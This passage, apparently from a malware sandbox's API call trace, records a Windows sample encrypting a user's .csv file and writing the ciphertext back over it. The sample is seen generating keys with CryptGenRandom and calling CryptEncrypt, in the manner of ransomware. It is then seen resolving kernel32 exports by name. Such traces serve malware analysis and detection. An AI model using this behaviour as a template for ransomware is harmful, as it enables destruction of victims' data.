(lpString1="csv", lpString2="dll") returned -1 [0084.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0084.526] lstrlenW (lpString="Aoe1mfCdGbGnQ.csv") returned 17 [0084.526] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0084.526] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="Aoe1mfCdGbGnQ.csv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv" [0084.526] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\aoe1mfcdgbgnq.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0084.526] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=26148) returned 1 [0084.526] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0084.526] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.527] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.527] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.527] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.527] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0084.527] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.528] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.528] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.528] CloseHandle (hObject=0x444) returned 1 [0084.529] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.529] WriteFile (in: hFile=0x440, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0084.529] CloseHandle (hObject=0x0) returned 0 [0084.529] CloseHandle (hObject=0x440) returned 1 [0084.529] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.530] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.530] GetTickCount () returned 0x114d97e [0084.530] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.530] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.530] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.530] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.531] lstrlenA (lpString="kernel32.dll") returned 12 [0084.531] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.531] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.531] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.531] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.531] lstrlenA (lpString="ADDATOMA") returned 8 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.531] lstrlenA (lpString="ADDATOMW") returned 8 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.531] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.531] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.531] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.531] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.531] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.531] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.531] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.531] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.531] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.531] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.532] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.532] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.532] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.532] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.532] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.532] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.532] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.532] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.532] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.532] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.532] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.532] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.532] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.532] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.532] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.532] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.532] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.532] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.532] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.533] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.533] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.533] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.533] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.533] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.533] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.533] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.533] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.533] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.533] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.533] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.533] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.533] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.533] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.533] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.533] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.533] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.533] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.534] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.534] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.534] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.534] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.534] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.534] lstrlenA (lpString="BEEP") returned 4 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.534] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.534] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.534] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.534] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.534] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.534] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.534] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.534] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.534] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.534] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.534] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.534] lstrlenA (lpString="CANCELIO") returned 8 [0084.534] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.534] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.535] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.535] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.535] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.535] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.535] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.535] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.535] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.535] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.535] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.535] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.535] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.535] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.535] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.535] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.535] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.535] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.535] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.535] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.535] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.536] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.536] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.536] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.536] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.536] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.536] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.536] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.536] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.536] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.536] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.536] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.536] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.536] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.536] lstrlenA (lpString="COMPARESTRINGEX") 